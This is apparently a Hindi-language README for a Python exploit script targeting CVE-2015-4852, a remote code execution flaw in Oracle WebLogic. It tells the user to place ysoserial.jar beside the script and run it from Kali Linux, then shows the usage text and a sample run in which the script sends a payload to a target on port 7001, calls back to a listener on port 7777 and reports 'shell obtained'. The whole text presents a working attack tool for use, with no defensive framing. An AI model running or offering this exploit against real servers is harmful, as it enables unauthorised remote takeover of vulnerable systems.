
CVE-2015-4852 (WebLogic RCE) के लिए पायथन एक्सप्लॉइट स्क्रिप्ट, जो ysoserial पेलोड का उपयोग करके कमजोर WebLogic सर्वरों पर दूरस्थ शेल एक्सेस प्राप्त करती है।
पूर्वापेक्षा: ysoserial.jar को स्क्रिप्ट निर्देशिका में रखें (ysoserial-0*.jar का नाम बदलकर ysoserial.jar करें)। इस स्क्रिप्ट को चलाने के लिए kali linux का उपयोग करना बेहतर है।
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help सहायता संदेश दिखाएँ और बाहर निकलें
-t TARGET, --target=TARGET ip पोर्ट
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
सुनने का आईपी पता दर्ज करें: 10.6.214.1
सुनने का पोर्ट दर्ज करें: 7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
निष्पादन सफल
शेल प्राप्त हुआ